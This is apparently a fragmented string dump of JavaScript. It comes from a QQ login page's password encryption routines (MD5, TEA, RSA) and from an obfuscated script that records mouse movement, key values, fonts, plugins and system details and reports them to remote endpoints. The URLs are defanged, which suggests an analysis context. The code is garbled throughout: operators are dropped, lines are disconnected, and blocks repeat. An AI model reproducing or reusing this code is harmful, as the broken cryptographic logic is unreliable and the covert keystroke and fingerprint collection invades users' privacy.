0 > s ? "-" == t.charAt(n) && (o = !0) : (o = !1, 0 == p ? this[this.t  ] = s: p   i > this.DB ? (this[this.t - 1] |= (s & (1 << this.DB - p) - 1) << p, this[this.t  ] = s >> this.DB - p) : this[this.t - 1] |= s << p, p  = i, p >= this.DB && (p -= this.DB))

8 == i && 0 != (128 & t[0]) && (this.s = -1, p > 0 && (this[this.t - 1] |= (1 << this.DB - p) - 1 << p)),

this.clamp(),

o && r.ZERO.subTo(this, this)

for (var t = this.s & this.DM; this.t > 0 && this[this.t - 1] == t;)--this.t

if (this.s < 0) return "-"   this.negate().toString(t);

if (4 != t) return this.toRadix(t);

s = this.DB - r * this.DB % e;

if (r-->0) for (s < this.DB && (i = this[r] >> s) > 0 && (o = !0, p = u(i)); r >= 0;) e > s ? (i = (this[r] & (1 << s) - 1) << e - s, i |= this[--r] >> (s  = this.DB - e)) : (i = this[r] >> (s -= e) & n, 0 >= s && (s  = this.DB, --r)),

return r.ZERO.subTo(this, t),

return this.s < 0 ? this.negate() : this

return this.t <= 0 ? 0 : this.DB * (this.t - 1)   b(this[this.t - 1] ^ this.s & this.DM)

e.t = Math.max(this.t - t, 0),

var i, n = t % this.DB,

o = this.DB - n,

r = Math.floor(t / this.DB),

s = this.s << n & this.DM;

e.clamp()

var i = Math.floor(t / this.DB);

var n = t % this.DB,

o = Math.min(t.t, this.t); o > i;) n  = this[i] - t[i],

e[i  ] = n & this.DM,

n >>= this.DB;

e[i  ] = n & this.DM,

n >>= this.DB;

-1 > n ? e[i  ] = this.DV   n: n > 0 && (e[i  ] = n),

var i = this.abs(),

n = t.abs(),

for (o = 0; o < n.t;   o) e[o   i.t] = i.am(0, n[o], e, o, 0, i.t);

e.clamp(),

this.s != t.s && r.ZERO.subTo(e, e)

for (var e = this.abs(), i = t.t = 2 * e.t; --i >= 0;) t[i] = 0;

var n = e.am(i, e[i], t, 2 * i, 0, 1); (t[i   e.t]  = e.am(i   1, 2 * e[i], t, 2 * i   1, n, e.t - i - 1)) >= e.DV && (t[i   e.t] -= e.DV, t[i   e.t   1] = 1)

t.t > 0 && (t[t.t - 1]  = e.am(i, e[i], t, 2 * i, 0, 1)),

t.clamp()

var n = t.abs();

var o = this.abs();

if (o.t < n.t) return null != e && e.fromInt(0),

void(null != i && this.copyTo(i));

c = this.DB - b(n[n.t - 1]);

c > 0 ? (n.lShiftTo(c, p), o.lShiftTo(c, i)) : (n.copyTo(p), o.copyTo(i));

h = this.FV / d,

for (p.dlShiftTo($, v), i.compareTo(v) >= 0 && (i[i.t  ] = 1, i.subTo(v, i)), r.ONE.dlShiftTo(u, v), v.subTo(p, p); p.t < u;) p[p.t  ] = 0;

var w = i[--_] == g ? this.DM: Math.floor(i[_] * h   (i[_ - 1]   m) * f);

if ((i[_]  = p.am(0, w, i, $, 0, u)) < w) for (p.dlShiftTo($, v), i.subTo(v, i); i[_] < --w;) i.subTo(v, i)

null != e && (i.drShiftTo(u, e), a != l && r.ZERO.subTo(e, e)),

i.clamp(),

c > 0 && i.rShiftTo(c, i),

0 > a && r.ZERO.subTo(i, i)

return this.abs().divRemTo(t, null, e),

this.s < 0 && e.compareTo(r.ZERO) > 0 && t.subTo(e, e),

return t.s < 0 || t.compareTo(this.m) >= 0 ? t.mod(this.m) : t

t.divRemTo(this.m, null, t)

t.multiplyTo(e, i),

this.reduce(i)

t.squareTo(e),

this.reduce(e)

e = e * (2 - t * e % this.DV) % this.DV,

e > 0 ? this.DV - e: -e

this.mp = t.invDigit(),

this.mpl = 32767 & this.mp,

this.mph = this.mp >> 15,

this.um = (1 << t.DB - 15) - 1,

this.mt2 = 2 * t.t

return t.abs().dlShiftTo(this.m.t, e),

e.divRemTo(this.m, null, e),

t.s < 0 && e.compareTo(r.ZERO) > 0 && this.m.subTo(e, e),

return t.copyTo(e),

this.reduce(e),

for (; t.t <= this.mt2;) t[t.t  ] = 0;

n = i * this.mpl   ((i * this.mph   (t[e] >> 15) * this.mpl & this.um) << 15) & t.DM;

for (i = e   this.m.t, t[i]  = this.m.am(0, n, t, e, 0, this.m.t); t[i] >= t.DV;) t[i] -= t.DV,

t.clamp(),

t.drShiftTo(this.m.t, t),

t.compareTo(this.m) >= 0 && t.subTo(this.m, t)

if (t > 4294967295 || 1 > t) return r.ONE;

o = e.convert(this),

for (o.copyTo(i); --p >= 0;) if (e.sqrTo(i, n), (t & 1 << p) > 0) e.mulTo(n, o, i);

return e.revert(i)

return i = 256 > t || e.isEven() ? new P(e) : new B(e),

this.exp(t, i)

X((new Date).getTime())

for (Z(), dt = nt(), dt.init(ht), ft = 0; ft < ht.length;   ft) ht[ft] = 0;

return dt.next()

for (e = 0; e < t.length;   e) t[e] = K()

for (i = 0, e = 0; 256 > e;   e) i = i   this.S[e]   t[e % t.length] & 255,

return o.setPublic(e, n),

o.encrypt(t)

i.prototype.doPublic = o,

i.prototype.setPublic = n,

i.prototype.encrypt = p;

st && "Microsoft Internet Explorer" == navigator.appName ? (r.prototype.am = l, pt = 30) : st && "Netscape" != navigator.appName ? (r.prototype.am = a, pt = 26) : (r.prototype.am = c, pt = 28),

r.prototype.DB = pt,

r.prototype.DM = (1 << pt) - 1,

r.prototype.DV = 1 << pt;

r.prototype.FV = Math.pow(2, at),

r.prototype.F1 = at - pt,

r.prototype.F2 = 2 * pt - at;

for (lt = "0".charCodeAt(0), ct = 0; 9 >= ct;   ct) gt[lt  ] = ct;

for (lt = "a".charCodeAt(0), ct = 10; 36 > ct;   ct) gt[lt  ] = ct;

for (lt = "A".charCodeAt(0), ct = 10; 36 > ct;   ct) gt[lt  ] = ct;

P.prototype.convert = Q,

P.prototype.revert = I,

P.prototype.reduce = H,

P.prototype.mulTo = M,

P.prototype.sqrTo = V,

B.prototype.convert = U,

B.prototype.revert = O,

B.prototype.reduce = j,

B.prototype.mulTo = F,

B.prototype.sqrTo = R,

r.prototype.copyTo = d,

r.prototype.fromInt = h,

r.prototype.fromString = m,

r.prototype.clamp = _,

r.prototype.dlShiftTo = S,

r.prototype.drShiftTo = q,

r.prototype.lShiftTo = C,

r.prototype.rShiftTo = T,

r.prototype.subTo = x,

r.prototype.multiplyTo = A,

r.prototype.squareTo = N,

r.prototype.divRemTo = E,

r.prototype.invDigit = D,

r.prototype.isEven = z,

r.prototype.exp = G,

r.prototype.toString = $,

r.prototype.negate = v,

r.prototype.abs = w,

r.prototype.compareTo = y,

r.prototype.bitLength = k,

r.prototype.mod = L,

r.prototype.modPowInt = W,

r.ZERO = f(0),

r.ONE = f(1);

if ("Netscape" == navigator.appName && navigator.appVersion < "5" && window.crypto && window.crypto.random) {

var _t = window.crypto.random(32);

for (mt = 0; mt < _t.length;   mt) ht[ft  ] = 255 & _t.charCodeAt(mt)

for (; $t > ft;) mt = Math.floor(65536 * Math.random()),

Y.prototype.nextBytes = J,

tt.prototype.init = et,

tt.prototype.next = it;

return Math.round(4294967295 * Math.random())

i = 0; i < t.length; i  ) {

var n = Number(t[i]).toString(16);

1 == n.length && (n = "0"   n),

i = 0; i < t.length; i  = 2) e  = String.fromCharCode(parseInt(t.substr(i, 2), 16));

for (var i = [], n = 0; n < t.length; n  ) i[n] = t.charCodeAt(n);

o = t.length;

for (e = 0; o > e; e  ) i = t.charCodeAt(e),

i > 0 && 127 >= i ? n.push(t.charAt(e)) : i >= 128 && 2047 >= i ? n.push(String.fromCharCode(192 | i >> 6 & 31), String.fromCharCode(128 | 63 & i)) : i >= 2048 && 65535 >= i && n.push(String.fromCharCode(224 | i >> 12 & 15), String.fromCharCode(128 | i >> 6 & 63), String.fromCharCode(128 | 63 & i));

return n.join("")

var i = t.length,

n = t.length;

for (var o = 0; o < i.length; o  ) i[o] = 0;

for (var t = (b.length, 0); 8 > t; t  ) $[t] ^= b[v   t];

if (e) for (var n = 0; n < t.length; n  ) i[n] = 255 & t.charCodeAt(n);

n = 0; n < t.length; n  = 2) i[o  ] = parseInt(t.substr(n, 2), 16);

t.TEA = {

for (var i = h(t, e), n = a(i), o = "", p = 0; p < n.length; p  ) o  = String.fromCharCode(n[p]);

initkey: function(t, e) {

S.PADCHAR = "=",

S.ALPHA = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /",

S.getbyte = function(t, e) {

var i = t.charCodeAt(e);

S.encode = function(t) {

if (1 != arguments.length) throw "SyntaxError: Not enough arguments";

var e, i, n = S.PADCHAR,

o = S.ALPHA,

p = S.getbyte,

var s = t.length - t.length % 3;

if (0 == t.length) return t;

r.push(o.charAt(i >> 18)),

r.push(o.charAt(i >> 12 & 63)),

r.push(o.charAt(i >> 6 & 63)),

r.push(o.charAt(63 & i));

switch (t.length - s) {

r.push(o.charAt(i >> 18)   o.charAt(i >> 12 & 63)   n   n);

r.push(o.charAt(i >> 18)   o.charAt(i >> 12 & 63)   o.charAt(i >> 6 & 63)   n)

return r.join("")

window.btoa || (window.btoa = S.encode)

return binl2hex(core_md5(str2binl(t), t.length * chrsz))

return binl2str(core_md5(str2binl(t), t.length * chrsz))

r = 0; r < t.length; r  = 16) {

i.length > 16 && (i = core_md5(i, t.length * chrsz));

var r = core_md5(n.concat(str2binl(e)), 512   e.length * chrsz);

return core_md5(o.concat(r), 640)

for (var e = Array(), i = (1 << chrsz) - 1, n = 0; n < t.length * chrsz; n  = chrsz) e[n >> 5] |= (t.charCodeAt(n / chrsz) & i) << n % 32;

i = (1 << chrsz) - 1, n = 0; n < 32 * t.length; n  = chrsz) e  = String.fromCharCode(t[n >> 5] >>> n % 32 & i);

for (var e = hexcase ? "0123456789ABCDEF": "0123456789abcdef", i = "", n = 0; n < 4 * t.length; n  ) i  = e.charAt(t[n >> 2] >> n % 4 * 8   4 & 15)   e.charAt(t[n >> 2] >> n % 4 * 8 & 15);

n = 0; n < 4 * t.length; n  = 3) for (var o = (t[n >> 2] >> 8 * (n % 4) & 255) << 16 | (t[n   1 >> 2] >> 8 * ((n   1) % 4) & 255) << 8 | t[n   2 >> 2] >> 8 * ((n   2) % 4) & 255, p = 0; 4 > p; p  ) i  = 8 * n   6 * p > 32 * t.length ? b64pad: e.charAt(o >> 6 * (3 - p) & 63);

for (var arr = [], i = 0; i < str.length; i  = 2) arr.push("\\x"   str.substr(i, 2));

return arr = arr.join(""),

if (! (Math.random() > (e || 1))) try {

var i = location.protocol   "//ui.ptlogin2.qq.com/cgi-bin/report?id="   t,

n = document.createElement("img");

n.src = i

TEA = window.TEA,

for (var o = n ? t: md5(t), p = hexchar2bin(o), r = md5(p   e), s = TEA.strToBytes(i.toUpperCase(), !0), a = Number(s.length / 2).toString(16); a.length < 4;) a = "0"   a;

TEA.initkey(r);

var l = TEA.encrypt(o   TEA.strToBytes(e)   a   s);

TEA.initkey("");

for (var c = Number(l.length / 2).toString(16); c.length < 4;) c = "0"   c;

var u = $pt.RSA.rsa_encrypt(hexchar2bin(c   l));

return window.btoa(hexchar2bin(u)).replace(/[\/\ =]/g,

"/": "-",

" ": "*",

"=": "_"

for (var hex = str.toString(16), len = hex.length, i = len; maxLength > i; i  ) hex = "0"   hex;

for (var arr = [], j = 0; maxLength > j; j  = 2) arr.push("\\x"   hex.substr(j, 2));

var result = arr.join("");

o = n   e.toUpperCase(),

p = $.RSA.rsa_encrypt(o);

return Math.round(4294967295*Math.random())

i=0;i<t.length;i  ){

var n=Number(t[i]).toString(16);

1==n.length&&(n="0" n),

i=0;i<t.length;i =2)e =String.fromCharCode(parseInt(t.substr(i,2),16));

for(var i=[],n=0;n<t.length;n  )i[n]=t.charCodeAt(n);

o=t.length;

for(e=0;o>e;e  )i=t.charCodeAt(e),

i>0&&127>=i?n.push(t.charAt(e)):i>=128&&2047>=i?n.push(String.fromCharCode(192|i>>6&31),String.fromCharCode(128|63&i)):i>=2048&&65535>=i&&n.push(String.fromCharCode(224|i>>12&15),String.fromCharCode(128|i>>6&63),String.fromCharCode(128|63&i));

return n.join("")

var i=t.length,

n=t.length;

for(var o=0;o<i.length;o  )i[o]=0;

for(var t=(k.length,0);8>t;t  )$[t]^=k[v t];

if(e)for(var n=0;n<t.length;n  )i[n]=255&t.charCodeAt(n);

n=0;n<t.length;n =2)i[o  ]=parseInt(t.substr(n,2),16);

t.TEA={

for(var i=h(t,e),n=a(i),o="",p=0;p<n.length;p  )o =String.fromCharCode(n[p]);

initkey:function(t,e){

q.PADCHAR="=",

q.ALPHA="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /",

q.getbyte=function(t,e){

var i=t.charCodeAt(e);

q.encode=function(t){

if(1!=arguments.length)throw"SyntaxError: Not enough arguments";

var e,i,n=q.PADCHAR,

o=q.ALPHA,

p=q.getbyte,

var s=t.length-t.length%3;

if(0==t.length)return t;

r.push(o.charAt(i>>18)),

r.push(o.charAt(i>>12&63)),

r.push(o.charAt(i>>6&63)),

r.push(o.charAt(63&i));

switch(t.length-s){

r.push(o.charAt(i>>18) o.charAt(i>>12&63) n n);

r.push(o.charAt(i>>18) o.charAt(i>>12&63) o.charAt(i>>6&63) n)

return r.join("")

window.btoa||(window.btoa=q.encode)

$.RSA=$pt.RSA=function(){

if(e<t.length 11)return uv_alert("Message too long for RSA"),

n=t.length-1;n>=0&&e>0;){

var o=t.charCodeAt(n--);

for(s[0]=0;0==s[0];)p.nextBytes(s);

this.dmp1=null,

this.dmq1=null,

this.coeff=null

null!=e&&null!=i&&e.length>0&&i.length>0?(this.n=t(e,16),this.e=parseInt(i,16)):uv_alert("Invalid RSA public key")

return t.modPowInt(this.e,this.n)

var i=e(t,this.n.bitLength() 7>>3);

var n=this.doPublic(i);

var o=n.toString(16);

return 0==(1&o.length)?o:"0" o

null!=t&&("number"==typeof t?this.fromNumber(t,e,i):null==e&&"string"!=typeof t?this.fromString(t,256):this.fromString(t,e))

o=Math.floor(r/67108864),

return ut.charAt(t)

var i=gt[t.charCodeAt(e)];

return e.fromInt(t),

if(4!=e)return void this.fromRadix(t,e);

for(var n=t.length,

0>s?"-"==t.charAt(n)&&(o=!0):(o=!1,0==p?this[this.t  ]=s:p i>this.DB?(this[this.t-1]|=(s&(1<<this.DB-p)-1)<<p,this[this.t  ]=s>>this.DB-p):this[this.t-1]|=s<<p,p =i,p>=this.DB&&(p-=this.DB))

8==i&&0!=(128&t[0])&&(this.s=-1,p>0&&(this[this.t-1]|=(1<<this.DB-p)-1<<p)),

this.clamp(),

o&&r.ZERO.subTo(this,this)

for(var t=this.s&this.DM;this.t>0&&this[this.t-1]==t;)--this.t

if(this.s<0)return"-" this.negate().toString(t);

if(4!=t)return this.toRadix(t);

s=this.DB-r*this.DB%e;

if(r-->0)for(s<this.DB&&(i=this[r]>>s)>0&&(o=!0,p=u(i));r>=0;)e>s?(i=(this[r]&(1<<s)-1)<<e-s,i|=this[--r]>>(s =this.DB-e)):(i=this[r]>>(s-=e)&n,0>=s&&(s =this.DB,--r)),

return r.ZERO.subTo(this,t),

return this.s<0?this.negate():this

return this.t<=0?0:this.DB*(this.t-1) k(this[this.t-1]^this.s&this.DM)

e.t=Math.max(this.t-t,0),

var i,n=t%this.DB,

o=this.DB-n,

r=Math.floor(t/this.DB),

s=this.s<<n&this.DM;

e.clamp()

var i=Math.floor(t/this.DB);

var n=t%this.DB,

o=Math.min(t.t,this.t);o>i;)n =this[i]-t[i],

e[i  ]=n&this.DM,

n>>=this.DB;

-1>n?e[i  ]=this.DV n:n>0&&(e[i  ]=n),

var i=this.abs(),

n=t.abs(),

for(o=0;o<n.t;  o)e[o i.t]=i.am(0,n[o],e,o,0,i.t);

e.clamp(),

this.s!=t.s&&r.ZERO.subTo(e,e)

for(var e=this.abs(),i=t.t=2*e.t;--i>=0;)t[i]=0;

var n=e.am(i,e[i],t,2*i,0,1);(t[i e.t] =e.am(i 1,2*e[i],t,2*i 1,n,e.t-i-1))>=e.DV&&(t[i e.t]-=e.DV,t[i e.t 1]=1)

t.t>0&&(t[t.t-1] =e.am(i,e[i],t,2*i,0,1)),

t.clamp()

var n=t.abs();

var o=this.abs();

if(o.t<n.t)return null!=e&&e.fromInt(0),

void(null!=i&&this.copyTo(i));

c=this.DB-k(n[n.t-1]);

c>0?(n.lShiftTo(c,p),o.lShiftTo(c,i)):(n.copyTo(p),o.copyTo(i));

h=this.FV/d,

for(p.dlShiftTo($,v),i.compareTo(v)>=0&&(i[i.t  ]=1,i.subTo(v,i)),r.ONE.dlShiftTo(u,v),v.subTo(p,p);p.t<u;)p[p.t  ]=0;

var y=i[--_]==g?this.DM:Math.floor(i[_]*h (i[_-1] m)*f);

if((i[_] =p.am(0,y,i,$,0,u))<y)for(p.dlShiftTo($,v),i.subTo(v,i);i[_]<--y;)i.subTo(v,i)

null!=e&&(i.drShiftTo(u,e),a!=l&&r.ZERO.subTo(e,e)),

i.clamp(),

c>0&&i.rShiftTo(c,i),

0>a&&r.ZERO.subTo(i,i)

return this.abs().divRemTo(t,null,e),

this.s<0&&e.compareTo(r.ZERO)>0&&t.subTo(e,e),

return t.s<0||t.compareTo(this.m)>=0?t.mod(this.m):t

t.divRemTo(this.m,null,t)

t.multiplyTo(e,i),

this.reduce(i)

t.squareTo(e),

this.reduce(e)

e=e*(2-t*e%this.DV)%this.DV,

e>0?this.DV-e:-e

this.mp=t.invDigit(),

this.mpl=32767&this.mp,

this.mph=this.mp>>15,

this.um=(1<<t.DB-15)-1,

this.mt2=2*t.t

return t.abs().dlShiftTo(this.m.t,e),

e.divRemTo(this.m,null,e),

t.s<0&&e.compareTo(r.ZERO)>0&&this.m.subTo(e,e),

return t.copyTo(e),

this.reduce(e),

for(;t.t<=this.mt2;)t[t.t  ]=0;

n=i*this.mpl ((i*this.mph (t[e]>>15)*this.mpl&this.um)<<15)&t.DM;

for(i=e this.m.t,t[i] =this.m.am(0,n,t,e,0,this.m.t);t[i]>=t.DV;)t[i]-=t.DV,

t.clamp(),

t.drShiftTo(this.m.t,t),

t.compareTo(this.m)>=0&&t.subTo(this.m,t)

if(t>4294967295||1>t)return r.ONE;

o=e.convert(this),

for(o.copyTo(i);--p>=0;)if(e.sqrTo(i,n),(t&1<<p)>0)e.mulTo(n,o,i);

return e.revert(i)

return i=256>t||e.isEven()?new A(e):new B(e),

this.exp(t,i)

X((new Date).getTime())

for(Z(),dt=nt(),dt.init(ht),ft=0;ft<ht.length;  ft)ht[ft]=0;

return dt.next()

for(e=0;e<t.length;  e)t[e]=K()

for(i=0,e=0;256>e;  e)i=i this.S[e] t[e%t.length]&255,

return o.setPublic(e,n),

o.encrypt(t)

i.prototype.doPublic=o,

i.prototype.setPublic=n,

i.prototype.encrypt=p;

st&&"Microsoft Internet Explorer"==navigator.appName?(r.prototype.am=l,pt=30):st&&"Netscape"!=navigator.appName?(r.prototype.am=a,pt=26):(r.prototype.am=c,pt=28),

r.prototype.DB=pt,

r.prototype.DM=(1<<pt)-1,

r.prototype.DV=1<<pt;

r.prototype.FV=Math.pow(2,at),

r.prototype.F1=at-pt,

r.prototype.F2=2*pt-at;

for(lt="0".charCodeAt(0),ct=0;9>=ct;  ct)gt[lt  ]=ct;

for(lt="a".charCodeAt(0),ct=10;36>ct;  ct)gt[lt  ]=ct;

for(lt="A".charCodeAt(0),ct=10;36>ct;  ct)gt[lt  ]=ct;

A.prototype.convert=I,

A.prototype.revert=Q,

A.prototype.reduce=M,

A.prototype.mulTo=D,

A.prototype.sqrTo=H,

B.prototype.convert=O,

B.prototype.revert=j,

B.prototype.reduce=V,

B.prototype.mulTo=F,

B.prototype.sqrTo=R,

r.prototype.copyTo=d,

r.prototype.fromInt=h,

r.prototype.fromString=m,

r.prototype.clamp=_,

r.prototype.dlShiftTo=q,

r.prototype.drShiftTo=S,

r.prototype.lShiftTo=C,

r.prototype.rShiftTo=T,

r.prototype.subTo=x,

r.prototype.multiplyTo=L,

r.prototype.squareTo=N,

r.prototype.divRemTo=E,

r.prototype.invDigit=U,

r.prototype.isEven=G,

r.prototype.exp=z,

r.prototype.toString=$,

r.prototype.negate=v,

r.prototype.abs=y,

r.prototype.compareTo=w,

r.prototype.bitLength=b,

r.prototype.mod=P,

r.prototype.modPowInt=W,

r.ZERO=f(0),

r.ONE=f(1);

if("Netscape"==navigator.appName&&navigator.appVersion<"5"&&window.crypto&&window.crypto.random){

var _t=window.crypto.random(32);

for(mt=0;mt<_t.length;  mt)ht[ft  ]=255&_t.charCodeAt(mt)

for(;$t>ft;)mt=Math.floor(65536*Math.random()),

Y.prototype.nextBytes=J,

tt.prototype.init=et,

tt.prototype.next=it;

$.Encryption=$pt.Encryption=function(){

return u(i(c(t),t.length*_))

u=0;u<t.length;u =16){

for(var e=Array(),i=(1<<_)-1,n=0;n<t.length*_;n =_)e[n>>5]|=(t.charCodeAt(n/_)&i)<<n2;

for(var e=m?"0123456789ABCDEF":"0123456789abcdef",i="",n=0;n<4*t.length;n  )i =e.charAt(t[n>>2]>>n%4*8 4&15) e.charAt(t[n>>2]>>n%4*8&15);

for(var e=[],i=0;i<t.length;i =2)e.push(String.fromCharCode(parseInt(t.substr(i,2),16)));

return e.join("")

if(!(Math.random()>(e||1)))try{

var i=location.protocol "//ui.ptlogin2.qq.com/cgi-bin/report?id=" t,

n=document.createElement("img");

n.src=i

for(var p=o?e:t(e),r=g(p),s=t(r i),a=TEA.strToBytes(n.toUpperCase(),!0),l=Number(a.length/2).toString(16);l.length<4;)l="0" l;

TEA.initkey(s);

var c=TEA.encrypt(p TEA.strToBytes(i) l a);

TEA.initkey("");

for(var u=Number(c.length/2).toString(16);u.length<4;)u="0" u;

var h=$pt.RSA.rsa_encrypt(g(u c));

return window.btoa(g(h)).replace(/[\/\ =]/g,

"/":"-",

" ":"*",

p=o i.toUpperCase(),

r=$.RSA.rsa_encrypt(p);

var p=$.Encryption.getEncryption(pwd,uid,code);

hXXps://ssl.captcha.qq.com/cap_union_new_getsig?aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&sess=

{557CF400-1A04-11D3-9A73-0000F81EF32E}

{557CF401-1A04-11D3-9A73-0000F81EF32E}

{557CF402-1A04-11D3-9A73-0000F81EF32E}

{557CF405-1A04-11D3-9A73-0000F81EF32E}

.tiff

{557CF406-1A04-11D3-9A73-0000F81EF32E}

_0xf21cxa["keyvalue"] = [];

var _0xf21cx15 = ["mousemove", "mouseclick", "keyvalue", "user_Agent", "resolutionx", "resolutiony", "url", "refer", "begintime", "endtime", "platform", "os", "keyboards", "flash", "pluginNum", "index", "ptcz", "tokenid"];

_0xf21cx19["cutUrl"] = _0xf21cx45;

_0xf21cx4c["push"]((_0xf21cx5e >>> 4).toString(16));

_0xf21cx4c["push"]((_0xf21cx5e & 15).toString(16))

return _0xf21cx4c["join"]("")

return _0xf21cx53["join"]("")

_0xf21cx54["HmacMD5"] = _0xf21cx57._createHmacHelper(_0xf21cx55)

keySize: 4,

for (var _0xf21cx40 = this["cfg"], _0xf21cx43 = _0xf21cx40["hasher"]["create"](), _0xf21cx58 = _0xf21cx31["create"](), _0xf21cx52 = _0xf21cx58["words"], _0xf21cx5a = _0xf21cx40["keySize"], _0xf21cx40 = _0xf21cx40["iterations"]; _0xf21cx52["length"] < _0xf21cx5a;) {

this["_key"] = _0xf21cx5b;

keySize: 4,

return (_0xf21cx5b ? _0xf21cx43["create"]([1398893684, 1701076831])["concat"](_0xf21cx5b)["concat"](_0xf21cx58) : _0xf21cx58).toString(_0xf21cx55)

key: _0xf21cx5c,

keySize: _0xf21cx58   _0xf21cx5c

key: _0xf21cx5b,

_0xf21cx5c = _0xf21cx53["PasswordBasedCipher"] = _0xf21cx5b["extend"]({

_0xf21cx53 = _0xf21cx31["kdf"]["execute"](_0xf21cx53, _0xf21cx58["keySize"], _0xf21cx58["ivSize"]);

_0xf21cx58 = _0xf21cx5b["encrypt"]["call"](this, _0xf21cx58, _0xf21cx5c, _0xf21cx53["key"], _0xf21cx31);

_0xf21cx53 = _0xf21cx31["kdf"]["execute"](_0xf21cx53, _0xf21cx58["keySize"], _0xf21cx58["ivSize"], _0xf21cx5c["salt"]);

return _0xf21cx5b["decrypt"]["call"](this, _0xf21cx58, _0xf21cx5c, _0xf21cx53["key"], _0xf21cx31)

for (var _0xf21cx5b = this["_key"], _0xf21cx5c = _0xf21cx5b["words"], _0xf21cx53 = _0xf21cx5b["sigBytes"] / 4, _0xf21cx5b = 4 * ((this["_nRounds"] = _0xf21cx53   6)   1), _0xf21cx4c = this["_keySchedule"] = [], _0xf21cx5d = 0; _0xf21cx5d < _0xf21cx5b; _0xf21cx5d  ) {

_0xf21cx5c = this["_invKeySchedule"] = [];

this._doCryptBlock(_0xf21cx5b, _0xf21cx58, this._keySchedule, _0xf21cx54, _0xf21cx55, _0xf21cx56, _0xf21cx57, _0xf21cx31)

this._doCryptBlock(_0xf21cx5b, _0xf21cx5c, this._invKeySchedule, _0xf21cx58, _0xf21cx59, _0xf21cx5a, _0xf21cx5f, _0xf21cx43);

keySize: 8

return this.valueOf()

return isFinite(this.valueOf()) ? this["getUTCFullYear"]()   "-"   _0xf21cx66(this["getUTCMonth"]()   1)   "-"   _0xf21cx66(this["getUTCDate"]())   "T"   _0xf21cx66(this["getUTCHours"]())   ":"   _0xf21cx66(this["getUTCMinutes"]())   ":"   _0xf21cx66(this["getUTCSeconds"]())   "Z": null

return typeof _0xf21cx5c === "string" ? _0xf21cx5c: "\\u"   ("0000"   _0xf21cx5b["charCodeAt"](0).toString(16))["slice"]( - 4)

_0xf21cx57 = _0xf21cx7e["length"] === 0 ? "[]": _0xf21cx75 ? "["   _0xf21cx75   _0xf21cx7e["join"](","   _0xf21cx75)   ""   _0xf21cx7d   "]": "["   _0xf21cx7e["join"](",")   "]";

_0xf21cx57 = _0xf21cx7e["length"] === 0 ? "{}": _0xf21cx75 ? "{"   _0xf21cx75   _0xf21cx7e["join"](","   _0xf21cx75)   ""   _0xf21cx7d   "}": "{"   _0xf21cx7e["join"](",")   "}";

throw new Error("JSON.stringify")

return "\\u"   ("0000"   _0xf21cx5b["charCodeAt"](0).toString(16))["slice"]( - 4)

throw new SyntaxError("JSON.parse")

_0xf21cxb7["push"]("["   _0xf21cx5b   "] "   _0xf21cxb9(_0xf21cx58["message"] && (_0xf21cx58["name"] || "Error")   ": "   _0xf21cx58["message"] || _0xf21cx58.toString()))

var _0xf21cxbe = "Symbol;Arial;Courier New;Times New Roman;Georgia;Trebuchet MS;Verdana;Impact;Comic Sans MS;Webdings;Tahoma;Microsoft Sans Serif;Wingdings;Arial Black;Lucida Console;Marlett;Lucida Sans Unicode;Courier;Franklin Gothic Medium;Palatino Linotype" ["split"](";");

this)["join"](";")

var _0xf21cxc3 = ["ShockwaveFlash.ShockwaveFlash", "AcroPDF.PDF", "PDF.PdfCtrl", "QuickTime.QuickTime", "rmocx.RealPlayer G2 Control", "rmocx.RealPlayer G2 Control.1", "RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)", "RealVideo.RealVideo(tm) ActiveX Control (32-bit)", "RealPlayer", "SWCtl.SWCtl", "WMPlayer.OCX", "AgControl.AgControl", "Skype.Detection"];

})["join"](";")

_0xf21cxc6 = _0xf21cxc2 ? _0xf21cxc2["Shockwave Flash"]["description"] : new ActiveXObject("ShockwaveFlash.ShockwaveFlash").GetVariable("$version")["replace"](",", ".")

return !! window["indexedDB"]

_0xf21cx5c["bSupportLocalStorage"] = _0xf21cxc9;

_0xf21cx5c["reportError"] = _0xf21cxb8;

_0xf21cxb6["reportError"]("cIPT", e)

_0xf21cx100["src"] = "hXXps://bsp.qcloud.qq.com/v2/index.php"   _0xf21cx46

_0xf21cxa["keyvalue"]["length"] = _0xf21cxd["length"] = 0

_0xf21cxa["url"] = _0xf21cx49;

_0xf21cxa["keyboards"] = _0xf21cxb;

_0xf21cxa["keyUpCnt"] = _0xf21cxc;

_0xf21cxa["keyUpValue"] = _0xf21cxd;

_0xf21cxa["keyvalue"] = [];

return _0xf21cx30 ? encodeURIComponent(_0xf21cx108.toString()) : "?Action=WebInfo&siteKey="   encodeURIComponent('<$=siteKey%>')   "&content="   encodeURIComponent(_0xf21cx108.toString())

_0xf21cxa["keyvalue"]["push"](_0xf21cxb2)

var _0xf21cx12d = (navigator["platform"] == "Win32") || (navigator["platform"] == "Windows");

var _0xf21cx132 = _0xf21cx12c["indexOf"]("Windows NT 5.0") > -1 || _0xf21cx12c["indexOf"]("Windows 2000") > -1;

var _0xf21cx133 = _0xf21cx12c["indexOf"]("Windows NT 5.1") > -1 || _0xf21cx12c["indexOf"]("Windows XP") > -1;

var _0xf21cx134 = _0xf21cx12c["indexOf"]("Windows NT 5.2") > -1 || _0xf21cx12c["indexOf"]("Windows 2003") > -1;

var _0xf21cx135 = _0xf21cx12c["indexOf"]("Windows NT 6.0") > -1 || _0xf21cx12c["indexOf"]("Windows Vista") > -1;

var _0xf21cx136 = _0xf21cx12c["indexOf"]("Windows NT 6.1") > -1 || _0xf21cx12c["indexOf"]("Windows 7") > -1;

var _0xf21cx13a = /firefox\/[\d.] /gi;

var _0xf21cx13b = /chrome\/[\d.] /gi;

return _0xf21cx138["match"](_0xf21cx139)["join"]("")

if (_0xf21cx138["indexOf"]("firefox") > 0) {

return _0xf21cx138["match"](_0xf21cx13a)["join"]("")

if (_0xf21cx138["indexOf"]("chrome") > 0) {

return _0xf21cx138["match"](_0xf21cx13b)["join"]("")

if (_0xf21cx138["indexOf"]("safari") > 0 && _0xf21cx138["indexOf"]("chrome") < 0) {

return _0xf21cx138["match"](_0xf21cx13c)["join"]("")

var _0xf21cx140 = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");

VSwf = _0xf21cx140.GetVariable("$version");

return encodeURIComponent(_0xf21cx108.toString());

var begintime = Math.floor(new Date().getTime() / 1000);

